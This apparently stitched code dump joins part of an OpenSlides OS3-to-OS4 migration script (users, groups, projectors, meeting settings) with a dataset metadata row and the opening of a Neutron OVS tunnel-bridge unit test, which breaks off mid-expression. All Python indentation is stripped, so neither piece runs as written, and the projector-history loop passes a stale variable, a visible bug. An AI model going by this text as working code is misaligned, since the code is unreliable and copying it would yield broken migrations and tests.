self.set_model("projector_countdown", new)
# Create two new countdowns: A LOS and a poll countdown
max_countdown_id = max_or_zero(
x["id"] for x in self.iter_collection("projector_countdown")
)
los_countdown = {
"id": max_countdown_id + 1,
"title": "list of speakers countdown",
"description": "created at the migration from OS3 to OS4",
"default_time": 60,
"countdown_time": 60,
"running": False,
"used_as_list_of_speaker_countdown_meeting_id": 1,
"used_as_poll_countdown_meeting_id": None,
"projection_ids": [],
"meeting_id": 1,
}
self.set_model("projector_countdown", los_countdown)
self.meeting["list_of_speakers_countdown_id"] = max_countdown_id + 1
poll_countdown = {
"id": max_countdown_id + 2,
"title": "poll countdown",
"description": "created at the migration from OS3 to OS4",
"default_time": 60,
"countdown_time": 60,
"running": False,
"used_as_list_of_speaker_countdown_meeting_id": None,
"used_as_poll_countdown_meeting_id": 1,
"projection_ids": [],
"meeting_id": 1,
}
self.set_model("projector_countdown", poll_countdown)
self.meeting["poll_countdown_id"] = max_countdown_id + 2
def migrate_personal_notes(self):
id_counter = 1
for old in self.get_collection("users/personal-note"):
notes = old.get("notes", {}).get("motions/motion", {})
for motion_id, note in notes.items():
motion_id = int(motion_id)
new = {
"id": id_counter,
"user_id": old["user_id"],
"content_object_id": f"motion/{motion_id}",
"note": note["note"],
"star": note["star"],
"meeting_id": 1,
}
motion = self.get_model("motion", motion_id)
motion["personal_note_ids"].append(id_counter)
self.set_model("personal_note", new)
id_counter += 1
def migrate_users(self):
for old in self.get_collection("users/user"):
new = copy(
old,
"id",
"username",
"title",
"first_name",
"last_name",
"is_active",
"default_password",
"gender",
"email",
)
new["is_physical_person"] = not old["is_committee"]
new["password"] = ""
new["default_number"] = old["number"]
new["default_structure_level"] = old["structure_level"]
new["default_vote_weight"] = old["vote_weight"]
new["last_email_send"] = to_unix_time(old["last_email_send"])
new["is_demo_user"] = is_demo_mode and old["id"] in demo_mode_users
new["organization_management_level"] = None
new["is_present_in_meeting_ids"] = []
if old["is_present"]:
new["is_present_in_meeting_ids"].append(1)
new["committee_ids"] = []
new["committee_$_management_level"] = []
new["comment_$"] = []
new["number_$"] = []
new["structure_level_$"] = []
new["about_me_$"] = []
new["vote_weight_$"] = []
group_ids = old["groups_id"] or [
1
] # explicitly put users ion the default group if they do not have a group.
self.set_template(new, "group_$_ids", group_ids)
# check for permission
new["can_change_own_password"] = False
for group_id in group_ids:
group = self.get_old_model("users/group", group_id)
if group_id == 2 or "users.can_change_password" in group["permissions"]:
new["can_change_own_password"] = True
break
self.set_template(
new,
"speaker_$_ids",
[
x["id"]
for x in self.iter_collection("speaker")
if old["id"] == x["user_id"]
],
)
self.set_template(
new,
"personal_note_$_ids",
[
x["id"]
for x in self.iter_collection("personal_note")
if old["id"] == x["user_id"]
],
)
self.set_template(
new,
"supported_motion_$_ids",
[
x["id"]
for x in self.iter_collection("motion")
if old["id"] in x["supporter_ids"]
],
)
self.set_template(
new,
"submitted_motion_$_ids",
[
x["id"]
for x in self.iter_collection("motion_submitter")
if old["id"] == x["user_id"]
],
)
self.set_template(
new,
"poll_voted_$_ids",
[
x["id"]
for x in self.iter_collection("poll")
if old["id"] in x["voted_ids"]
],
)
self.set_template(
new,
"option_$_ids",
[
x["id"]
for x in self.iter_collection("option")
if f"user/{old['id']}" == x["content_object_id"]
],
)
self.set_template(
new,
"vote_$_ids",
[
x["id"]
for x in self.iter_collection("vote")
if old["id"] == x["user_id"]
],
)
self.set_template(
new,
"vote_delegated_vote_$_ids",
[
x["id"]
for x in self.iter_collection("vote")
if old["id"] == x["delegated_user_id"]
],
)
self.set_template(
new,
"assignment_candidate_$_ids",
[
x["id"]
for x in self.iter_collection("assignment_candidate")
if old["id"] == x["user_id"]
],
)
new["projection_$_ids"] = []
self.set_template(
new, "vote_delegated_$_to_id", old["vote_delegated_to_id"]
)
self.set_template(
new, "vote_delegations_$_from_ids", old["vote_delegated_from_users_id"]
)
new["meeting_ids"] = [1]
self.set_model("user", new)
def set_template(self, obj, field, value):
if value:
obj[field] = ["1"]
parts = field.split("$")
obj[f"{parts[0]}$1{parts[1]}"] = value
else:
obj[field] = []
def migrate_groups(self):
# important to do after users since the reverse relation to users depends on their migration.
for old in self.get_collection("users/group"):
new = copy(old, "id", "name")
new["permissions"] = self.migrate_permissions(old["permissions"])
new["user_ids"] = [
x["id"]
for x in self.iter_collection("user")
if old["id"] in x["group_$1_ids"]
]
new["default_group_for_meeting_id"] = (
1 if old["id"] == 1 else None
) # default group
new["admin_group_for_meeting_id"] = (
1 if old["id"] == 2 else None
) # admin group
new["mediafile_access_group_ids"] = [
x["id"]
for x in self.iter_collection("mediafile")
if old["id"] in x["access_group_ids"]
]
new["mediafile_inherited_access_group_ids"] = [
x["id"]
for x in self.iter_collection("mediafile")
if old["id"] in x["inherited_access_group_ids"]
]
new["read_comment_section_ids"] = [
x["id"]
for x in self.iter_collection("motion_comment_section")
if old["id"] in x["read_group_ids"]
]
new["write_comment_section_ids"] = [
x["id"]
for x in self.iter_collection("motion_comment_section")
if old["id"] in x["write_group_ids"]
]
new["read_chat_group_ids"] = [
x["id"]
for x in self.iter_collection("chat_group")
if old["id"] in x["read_group_ids"]
]
new["write_chat_group_ids"] = [
x["id"]
for x in self.iter_collection("chat_group")
if old["id"] in x["write_group_ids"]
]
new["poll_ids"] = [
x["id"]
for x in self.iter_collection("poll")
if old["id"] in x["entitled_group_ids"]
]
new[
"used_as_motion_poll_default_id"
] = None # Next 3 are set by meeting migrations
new["used_as_assignment_poll_default_id"] = None
new["used_as_poll_default_id"] = None
new["meeting_id"] = 1
self.set_model("group", new)
self.meeting["default_group_id"] = 1
self.meeting["admin_group_id"] = 2
def migrate_permissions(self, perms):
# Note that poll.can_manage is not added to any group since
# stand-alone polls do not exist in OS3.
perms = [
PERMISSION_MAPPING[x] for x in perms if PERMISSION_MAPPING[x] is not None
]
new_perms = set(perms)
for perm in perms:
new_perms -= set(PERMISSION_HIERARCHIE.get(perm, []))
return list(new_perms)
def migrate_projectors(self):
self.projection_id_counter = 1
for old in self.get_collection("core/projector"):
new = copy(
old,
"id",
"name",
"scale",
"scroll",
"width",
"aspect_ratio_numerator",
"aspect_ratio_denominator",
"color",
"background_color",
"header_background_color",
"header_font_color",
"header_h1_color",
"chyron_background_color",
"chyron_font_color",
"show_header_footer",
"show_title",
"show_logo",
)
new["show_clock"] = False
new["current_projection_ids"] = []
new["preview_projection_ids"] = []
new["history_projection_ids"] = []
for i, element in enumerate(old["elements"]):
if element["name"] == "core/clock":
new["show_clock"] = True
continue
projection_id = self.create_projection_from_projector_element(
element, i + 1, "current", old["id"]
)
new["current_projection_ids"].append(projection_id)
for i, element in enumerate(old["elements_preview"]):
projection_id = self.create_projection_from_projector_element(
element, i + 1, "preview", old["id"]
)
new["preview_projection_ids"].append(projection_id)
flat_history = [
item for sublist in old["elements_history"] for item in sublist
]
for i, elements in enumerate(flat_history):
projection_id = self.create_projection_from_projector_element(
element, i + 1, "history", old["id"]
)
new["history_projection_ids"].append(projection_id)
if old["reference_projector_id"] == old["id"]:
self.meeting["reference_projector_id"] = old["id"]
new["used_as_reference_projector_meeting_id"] = 1
else:
new["used_as_reference_projector_meeting_id"] = None
new[
"used_as_default_$_in_meeting_id"
] = [] # will be filled when migrating the meeting
new["meeting_id"] = 1
self.set_model("projector", new)
def create_projection_from_projector_element(
self, element, weight, type, projector_id
):
"""type can be "current", "preview" or "history" """
projection = {
"id": self.projection_id_counter,
"stable": element.get("stable", True),
"weight": weight,
"options": {},
"current_projector_id": None,
"preview_projector_id": None,
"history_projector_id": None,
"meeting_id": 1,
}
projection[f"{type}_projector_id"] = projector_id
for k, v in element.items():
if k not in ("id", "name", "stable"):
projection["options"][k] = v
collection = element["name"]
if collection in COLLECTION_MAPPING:
id = self.to_new_id(collection, element["id"])
collection = COLLECTION_MAPPING[collection]
projection["content_object_id"] = f"{collection}/{id}"
projection["type"] = None
elif collection == "agenda/item-list":
collection = "meeting"
id = 1
projection["content_object_id"] = "meeting/1"
projection["type"] = "agenda_item_list"
elif collection in (
"agenda/current-list-of-speakers",
"agenda/current-list-of-speakers-overlay",
):
collection = "meeting"
id = 1
projection["content_object_id"] = "meeting/1"
projection["type"] = "current_list_of_speakers"
elif collection == "agenda/current-speaker-chyron":
collection = "meeting"
id = 1
projection["content_object_id"] = "meeting/1"
projection["type"] = "current_speaker_chyron"
else:
raise OS4ExporterException(f"Unknown slide {collection}")
if collection != "user":
content_object = self.get_model(collection, id)
content_object["projection_ids"].append(projection["id"])
else:
user = self.get_model(collection, id)
if not user["projection_$_ids"]:
user["projection_$_ids"] = ["1"]
user["projection_$1_ids"] = []
user["projection_$1_ids"].append(projection["id"])
self.projection_id_counter += 1
self.set_model("projection", projection)
return projection["id"]
def migrate_meeting(self):
configs = {
config["key"]: config["value"]
for config in self.get_collection("core/config")
}
self.meeting["welcome_title"] = configs["general_event_welcome_title"]
self.meeting["welcome_text"] = configs["general_event_welcome_text"]
self.meeting["name"] = configs["general_event_name"]
self.meeting["description"] = configs["general_event_description"]
self.meeting["location"] = configs["general_event_location"]
self.meeting[
"start_time"
] = 0 # Since it is a freehand field in OS3, it cannot be parsed
self.meeting["end_time"] = 0
self.meeting["jitsi_domain"] = getattr(settings, "JITSI_DOMAIN", None)
self.meeting["jitsi_room_name"] = getattr(settings, "JITSI_ROOM_NAME", None)
self.meeting["jitsi_room_password"] = getattr(
settings, "JITSI_ROOM_PASSWORD", None
)
self.meeting["enable_chat"] = getattr(settings, "ENABLE_CHAT", False)
self.meeting["imported_at"] = None
self.meeting["url_name"] = None
self.meeting["template_for_committee_id"] = None
self.meeting["enable_anonymous"] = configs["general_system_enable_anonymous"]
self.meeting["custom_translations"] = configs["translations"]
self.meeting["conference_show"] = configs["general_system_conference_show"]
self.meeting["conference_auto_connect"] = configs[
"general_system_conference_auto_connect"
]
self.meeting["conference_los_restriction"] = configs[
"general_system_conference_los_restriction"
]
self.meeting["conference_stream_url"] = configs["general_system_stream_url"]
self.meeting["conference_stream_poster_url"] = configs[
"general_system_stream_poster"
]
self.meeting["conference_open_microphone"] = configs[
"general_system_conference_open_microphone"
]
self.meeting["conference_open_video"] = configs[
"general_system_conference_open_video"
]
self.meeting["conference_auto_connect_next_speakers"] = configs[
"general_system_conference_auto_connect_next_speakers"
]
# TODO: missing setting in OS4
# self.meeting["conference_enable_helpdesk"] = configs["general_system_conference_enable_helpdesk"]
self.meeting["projector_countdown_default_time"] = configs[
"projector_default_countdown"
]
self.meeting["projector_countdown_warning_time"] = configs[
"agenda_countdown_warning_time"
]
self.meeting["export_csv_encoding"] = configs["general_csv_encoding"]
self.meeting["export_csv_separator"] = configs["general_csv_separator"]
self.meeting["export_pdf_pagenumber_alignment"] = configs[
"general_export_pdf_pagenumber_alignment"
]
self.meeting["export_pdf_fontsize"] = int(
configs["general_export_pdf_fontsize"]
)
self.meeting["export_pdf_pagesize"] = configs["general_export_pdf_pagesize"]
self.meeting["agenda_show_subtitles"] = configs["agenda_show_subtitle"]
self.meeting["agenda_enable_numbering"] = configs["agenda_enable_numbering"]
prefix = configs["agenda_number_prefix"]
self.meeting["agenda_number_prefix"] = (
prefix if len(prefix) <= 20 else prefix[0:20]
)
self.meeting["agenda_numeral_system"] = configs["agenda_numeral_system"]
self.meeting["agenda_item_creation"] = configs["agenda_item_creation"]
self.meeting["agenda_new_items_default_visibility"] = {
"1": "common",
"2": "internal",
"3": "hidden",
}[configs["agenda_new_items_default_visibility"]]
self.meeting["agenda_show_internal_items_on_projector"] = not configs[
"agenda_hide_internal_items_on_projector"
]
self.meeting["list_of_speakers_amount_last_on_projector"] = configs[
"agenda_show_last_speakers"
]
self.meeting["list_of_speakers_amount_next_on_projector"] = configs[
"agenda_show_next_speakers"
]
self.meeting["list_of_speakers_couple_countdown"] = configs[
"agenda_couple_countdown_and_speakers"
]
self.meeting["list_of_speakers_show_amount_of_speakers_on_slide"] = not configs[
"agenda_hide_amount_of_speakers"
]
self.meeting["list_of_speakers_present_users_only"] = configs[
"agenda_present_speakers_only"
]
self.meeting["list_of_speakers_show_first_contribution"] = configs[
"agenda_show_first_contribution"
]
self.meeting["list_of_speakers_enable_point_of_order_speakers"] = configs[
"agenda_enable_point_of_order_speakers"
]
self.meeting["list_of_speakers_enable_pro_contra_speech"] = configs[
"agenda_list_of_speakers_enable_pro_contra_speech"
]
self.meeting["list_of_speakers_can_set_contribution_self"] = configs[
"agenda_list_of_speakers_can_set_mark_self"
]
self.meeting["list_of_speakers_speaker_note_for_everyone"] = configs[
"agenda_list_of_speakers_speaker_note_for_everyone"
]
self.meeting["list_of_speakers_initially_closed"] = configs[
"agenda_list_of_speakers_initially_closed"
]
workflow_id = int(configs["motions_workflow"])
workflow = self.get_model("motion_workflow", workflow_id)
workflow["default_workflow_meeting_id"] = 1
self.meeting["motions_default_workflow_id"] = workflow_id
workflow_id = int(configs["motions_amendments_workflow"])
workflow = self.get_model("motion_workflow", workflow_id)
workflow["default_amendment_workflow_meeting_id"] = 1
self.meeting["motions_default_amendment_workflow_id"] = workflow_id
workflow_id = int(configs["motions_statute_amendments_workflow"])
workflow = self.get_model("motion_workflow", workflow_id)
workflow["default_statute_amendment_workflow_meeting_id"] = 1
self.meeting["motions_default_statute_amendment_workflow_id"] = workflow_id
self.meeting["motions_preamble"] = configs["motions_preamble"]
self.meeting["motions_default_line_numbering"] = configs[
"motions_default_line_numbering"
]
self.meeting["motions_line_length"] = configs["motions_line_length"]
self.meeting["motions_reason_required"] = configs["motions_reason_required"]
self.meeting["motions_enable_text_on_projector"] = not configs[
"motions_disable_text_on_projector"
]
self.meeting["motions_enable_reason_on_projector"] = not configs[
"motions_disable_reason_on_projector"
]
self.meeting["motions_enable_sidebox_on_projector"] = not configs[
"motions_disable_sidebox_on_projector"
]
self.meeting["motions_enable_recommendation_on_projector"] = not configs[
"motions_disable_recommendation_on_projector"
]
self.meeting["motions_show_referring_motions"] = not configs[
"motions_hide_referring_motions"
]
self.meeting["motions_show_sequential_number"] = configs[
"motions_show_sequential_numbers"
]
self.meeting["motions_recommendations_by"] = configs[
"motions_recommendations_by"
]
self.meeting["motions_statute_recommendations_by"] = configs[
"motions_statute_recommendations_by"
]
self.meeting["motions_recommendation_text_mode"] = configs[
"motions_recommendation_text_mode"
]
self.meeting["motions_default_sorting"] = configs["motions_motions_sorting"]
self.meeting["motions_number_type"] = configs["motions_identifier"]
self.meeting["motions_number_min_digits"] = configs[
"motions_identifier_min_digits"
]
self.meeting["motions_number_with_blank"] = configs[
"motions_identifier_with_blank"
]
self.meeting["motions_statutes_enabled"] = configs["motions_statutes_enabled"]
self.meeting["motions_amendments_enabled"] = configs[
"motions_amendments_enabled"
]
self.meeting["motions_amendments_in_main_list"] = configs[
"motions_amendments_main_table"
]
self.meeting["motions_amendments_of_amendments"] = configs[
"motions_amendments_of_amendments"
]
self.meeting["motions_amendments_prefix"] = configs["motions_amendments_prefix"]
self.meeting["motions_amendments_text_mode"] = configs[
"motions_amendments_text_mode"
]
self.meeting["motions_amendments_multiple_paragraphs"] = configs[
"motions_amendments_multiple_paragraphs"
]
self.meeting["motions_supporters_min_amount"] = configs[
"motions_min_supporters"
]
self.meeting["motions_export_title"] = configs["motions_export_title"]
self.meeting["motions_export_preamble"] = configs["motions_export_preamble"]
self.meeting["motions_export_submitter_recommendation"] = configs[
"motions_export_submitter_recommendation"
]
self.meeting["motions_export_follow_recommendation"] = configs[
"motions_export_follow_recommendation"
]
self.meeting["motion_poll_ballot_paper_selection"] = configs[
"motions_pdf_ballot_papers_selection"
]
self.meeting["motion_poll_ballot_paper_number"] = configs[
"motions_pdf_ballot_papers_number"
]
self.meeting["motion_poll_default_type"] = configs["motion_poll_default_type"]
self.meeting["motion_poll_default_100_percent_base"] = configs[
"motion_poll_default_100_percent_base"
]
self.meeting["motion_poll_default_majority_method"] = configs[
"motion_poll_default_majority_method"
]
group_ids = configs["motion_poll_default_groups"]
for group_id in group_ids:
group = self.get_model("group", group_id)
group["used_as_motion_poll_default_id"] = 1
self.meeting["motion_poll_default_group_ids"] = group_ids
self.meeting["users_sort_by"] = configs["users_sort_by"]
self.meeting["users_enable_presence_view"] = configs[
"users_enable_presence_view"
]
self.meeting["users_enable_vote_weight"] = configs["users_activate_vote_weight"]
self.meeting["users_allow_self_set_present"] = configs[
"users_allow_self_set_present"
]
self.meeting["users_pdf_welcometitle"] = configs["users_pdf_welcometitle"]
self.meeting["users_pdf_welcometext"] = configs["users_pdf_welcometext"]
self.meeting["users_pdf_url"] = configs["users_pdf_url"]
self.meeting["users_pdf_wlan_ssid"] = configs["users_pdf_wlan_ssid"]
self.meeting["users_pdf_wlan_password"] = configs["users_pdf_wlan_password"]
self.meeting["users_pdf_wlan_encryption"] = configs["users_pdf_wlan_encryption"]
self.meeting["users_email_sender"] = configs["users_email_sender"]
self.meeting["users_email_replyto"] = configs["users_email_replyto"]
self.meeting["users_email_subject"] = configs["users_email_subject"]
self.meeting["users_email_body"] = configs["users_email_body"]
self.meeting["assignments_export_title"] = configs["assignments_pdf_title"]
self.meeting["assignments_export_preamble"] = configs[
"assignments_pdf_preamble"
]
self.meeting["assignment_poll_ballot_paper_selection"] = configs[
"assignments_pdf_ballot_papers_selection"
]
self.meeting["assignment_poll_ballot_paper_number"] = configs[
"assignments_pdf_ballot_papers_number"
]
self.meeting["assignment_poll_add_candidates_to_list_of_speakers"] = configs[
"assignment_poll_add_candidates_to_list_of_speakers"
]
self.meeting["assignment_poll_sort_poll_result_by_votes"] = configs[
"assignment_poll_sort_poll_result_by_votes"
]
self.meeting["assignment_poll_default_type"] = configs[
"assignment_poll_default_type"
]
self.meeting["assignment_poll_default_method"] = configs[
"assignment_poll_method"
]
self.meeting["assignment_poll_default_100_percent_base"] = configs[
"assignment_poll_default_100_percent_base"
]
self.meeting["assignment_poll_default_majority_method"] = configs[
"assignment_poll_default_majority_method"
]
group_ids = configs["assignment_poll_default_groups"]
for group_id in group_ids:
group = self.get_model("group", group_id)
group["used_as_assignment_poll_default_id"] = 1
self.meeting["assignment_poll_default_group_ids"] = group_ids
self.meeting["poll_ballot_paper_selection"] = "CUSTOM_NUMBER"
self.meeting["poll_ballot_paper_number"] = 8
self.meeting["poll_sort_poll_result_by_votes"] = True
self.meeting["poll_default_type"] = "analog"
self.meeting["poll_default_method"] = "Y"
self.meeting["poll_default_100_percent_base"] = "YNA"
self.meeting["poll_default_majority_method"] = "simple"
self.meeting["poll_default_group_ids"] = []
self.meeting["poll_couple_countdown"] = True
for collection in (
"projector",
"projector_message",
"projector_countdown",
"tag",
"agenda_item",
"list_of_speakers",
"speaker",
"topic",
"group",
"mediafile",
"motion",
"motion_comment_section",
"motion_category",
"motion_block",
"motion_workflow",
"motion_statute_paragraph",
"motion_comment",
"motion_submitter",
"motion_change_recommendation",
"motion_state",
"poll",
"option",
"vote",
"assignment",
"assignment_candidate",
"personal_note",
"chat_group",
):
self.meeting[f"{collection}_ids"] = [
x["id"] for x in self.iter_collection(collection)
]
self.meeting["all_projection_ids"] = [
x["id"] for x in self.iter_collection("projection")
]
# projection_ids was set when creating self.meeting
self.migrate_logos_and_fonts(configs, "logo")
self.migrate_logos_and_fonts(configs, "font")
self.meeting["committee_id"] = None
self.meeting["default_meeting_for_committee_id"] = None
self.meeting["organization_tag_ids"] = []
self.meeting["present_user_ids"] = [
x["id"]
for x in self.iter_collection("user")
if 1 in x["is_present_in_meeting_ids"]
]
self.meeting["user_ids"] = [x["id"] for x in self.iter_collection("user")]
# reference_projector_id is set by the projector migration
# list_of_speakers_countdown_id and poll_countdown_id are set by the countdown migration
self.meeting["default_projector_$_id"] = []
for pd in self.get_collection("core/projection-default"):
name = PROJECTION_DEFAULT_NAME_MAPPING[pd["name"]]
projector = self.get_model("projector", pd["projector_id"])
projector["used_as_default_$_in_meeting_id"].append(name)
projector[f"used_as_default_${name}_in_meeting_id"] = 1
self.meeting["default_projector_$_id"].append(name)
self.meeting[f"default_projector_${name}_id"] = pd["projector_id"]
# Add "poll"
projector_id = self.meeting["projector_ids"][0] # get an arbitrary projector id
projector = self.get_model("projector", projector_id)
projector["used_as_default_$_in_meeting_id"].append("poll")
projector["used_as_default_$poll_in_meeting_id"] = 1
self.meeting["default_projector_$_id"].append("poll")
self.meeting["default_projector_$poll_id"] = projector_id
# default_group_id and admin_group_id are set by the group migration
def migrate_logos_and_fonts(self, configs, type):
self.meeting[f"{type}_$_id"] = []
for place in configs[f"{type}s_available"]:
path = configs[place].get("path", "")
if not path:
continue
# find mediafile
mediafile_id = None
for m in self.get_collection("mediafiles/mediafile"):
m_path = m["media_url_prefix"] + m["path"]
if m_path == path:
mediafile_id = m["id"]
break
if not mediafile_id:
continue
replacement = place.split("_", 2)[1]
mediafile = self.get_model("mediafile", mediafile_id)
mediafile[f"used_as_{type}_$_in_meeting_id"].append(replacement)
mediafile[f"used_as_{type}_${replacement}_in_meeting_id"] = 1
self.meeting[f"{type}_$_id"].append(replacement)
self.meeting[f"{type}_${replacement}_id"] = mediafile_id
| mit | 812,854,984,259,115,900 | 38.708046 | 115 | 0.528267 | false |
apporc/neutron | neutron/tests/unit/plugins/ml2/drivers/openvswitch/agent/openflow/native/test_br_tun.py | 18 | 19192 | # Copyright (C) 2014,2015 VA Linux Systems Japan K.K.
# Copyright (C) 2014,2015 YAMAMOTO Takashi <yamamoto at valinux co jp>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import neutron.plugins.ml2.drivers.openvswitch.agent.common.constants \
as ovs_const
from neutron.tests.unit.plugins.ml2.drivers.openvswitch.agent.openflow.native \
import ovs_bridge_test_base
call = mock.call # short hand
class OVSTunnelBridgeTest(ovs_bridge_test_base.OVSBridgeTestBase,
ovs_bridge_test_base.OVSDVRProcessTestMixin):
dvr_process_table_id = ovs_const.DVR_PROCESS
dvr_process_next_table_id = ovs_const.PATCH_LV_TO_TUN
def setUp(self):
super(OVSTunnelBridgeTest, self).setUp()
self.setup_bridge_mock('br-tun', self.br_tun_cls)
def test_setup_default_table(self):
patch_int_ofport = 5555
arp_responder_enabled = False
self.br.setup_default_table(patch_int_ofport=patch_int_ofport,
arp_responder_enabled=arp_responder_enabled)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=2)],
match=ofpp.OFPMatch(in_port=patch_int_ofport),
priority=1, table_id=0)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0, table_id=0)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=20)],
match=ofpp.OFPMatch(
eth_dst=('00:00:00:00:00:00', '01:00:00:00:00:00')),
priority=0,
table_id=2)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=22)],
match=ofpp.OFPMatch(
eth_dst=('01:00:00:00:00:00', '01:00:00:00:00:00')),
priority=0,
table_id=2)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0, table_id=3)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0, table_id=4)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0, table_id=6)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, [
ofpp.NXActionLearn(
cookie=0,
hard_timeout=300,
priority=1,
specs=[
ofpp.NXFlowSpecMatch(
dst=('vlan_vid', 0),
n_bits=12,
src=('vlan_vid', 0)),
ofpp.NXFlowSpecMatch(
dst=('eth_dst', 0),
n_bits=48,
src=('eth_src', 0)),
ofpp.NXFlowSpecLoad(
dst=('vlan_vid', 0),
n_bits=12,
src=0),
ofpp.NXFlowSpecLoad(
dst=('tunnel_id', 0),
n_bits=64,
src=('tunnel_id', 0)),
ofpp.NXFlowSpecOutput(
dst='',
n_bits=32,
src=('in_port', 0)),
],
table_id=20),
ofpp.OFPActionOutput(patch_int_ofport, 0),
]),
],
match=ofpp.OFPMatch(),
priority=1,
table_id=10)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=22)],
match=ofpp.OFPMatch(),
priority=0,
table_id=20)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0,
table_id=22))
]
self.assertEqual(expected, self.mock.mock_calls)
def test_setup_default_table_arp_responder_enabled(self):
patch_int_ofport = 5555
arp_responder_enabled = True
self.br.setup_default_table(patch_int_ofport=patch_int_ofport,
arp_responder_enabled=arp_responder_enabled)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=2)],
match=ofpp.OFPMatch(in_port=patch_int_ofport),
priority=1, table_id=0)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0, table_id=0)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=21)],
match=ofpp.OFPMatch(
eth_dst='ff:ff:ff:ff:ff:ff',
eth_type=self.ether_types.ETH_TYPE_ARP),
priority=1,
table_id=2)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=20)],
match=ofpp.OFPMatch(
eth_dst=('00:00:00:00:00:00', '01:00:00:00:00:00')),
priority=0,
table_id=2)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=22)],
match=ofpp.OFPMatch(
eth_dst=('01:00:00:00:00:00', '01:00:00:00:00:00')),
priority=0,
table_id=2)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0, table_id=3)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0, table_id=4)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0, table_id=6)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, [
ofpp.NXActionLearn(
cookie=0,
hard_timeout=300,
priority=1,
specs=[
ofpp.NXFlowSpecMatch(
dst=('vlan_vid', 0),
n_bits=12,
src=('vlan_vid', 0)),
ofpp.NXFlowSpecMatch(
dst=('eth_dst', 0),
n_bits=48,
src=('eth_src', 0)),
ofpp.NXFlowSpecLoad(
dst=('vlan_vid', 0),
n_bits=12,
src=0),
ofpp.NXFlowSpecLoad(
dst=('tunnel_id', 0),
n_bits=64,
src=('tunnel_id', 0)),
ofpp.NXFlowSpecOutput(
dst='',
n_bits=32,
src=('in_port', 0)),
],
table_id=20),
ofpp.OFPActionOutput(patch_int_ofport, 0),
]),
],
match=ofpp.OFPMatch(),
priority=1,
table_id=10)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=22)],
match=ofpp.OFPMatch(),
priority=0,
table_id=20)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[ofpp.OFPInstructionGotoTable(table_id=22)],
match=ofpp.OFPMatch(),
priority=0,
table_id=21)),
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[],
match=ofpp.OFPMatch(),
priority=0,
table_id=22))
]
self.assertEqual(expected, self.mock.mock_calls)
def test_provision_local_vlan(self):
network_type = 'vxlan'
lvid = 888
segmentation_id = 777
distributed = False
self.br.provision_local_vlan(network_type=network_type, lvid=lvid,
segmentation_id=segmentation_id,
distributed=distributed)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, [
ofpp.OFPActionPushVlan(),
ofpp.OFPActionSetField(
vlan_vid=lvid | ofp.OFPVID_PRESENT)
]),
ofpp.OFPInstructionGotoTable(table_id=10),
],
match=ofpp.OFPMatch(tunnel_id=segmentation_id),
priority=1,
table_id=4)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_reclaim_local_vlan(self):
network_type = 'vxlan'
segmentation_id = 777
self.br.reclaim_local_vlan(network_type=network_type,
segmentation_id=segmentation_id)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call.delete_flows(
table_id=4,
match=ofpp.OFPMatch(tunnel_id=segmentation_id)),
]
self.assertEqual(expected, self.mock.mock_calls)
def test_install_flood_to_tun(self):
vlan = 3333
tun_id = 2222
ports = [11, 44, 22, 33]
self.br.install_flood_to_tun(vlan=vlan,
tun_id=tun_id,
ports=ports)
(dp, ofp, ofpp) = self._get_dp()
expected = [
call._send_msg(ofpp.OFPFlowMod(dp,
cookie=0,
instructions=[
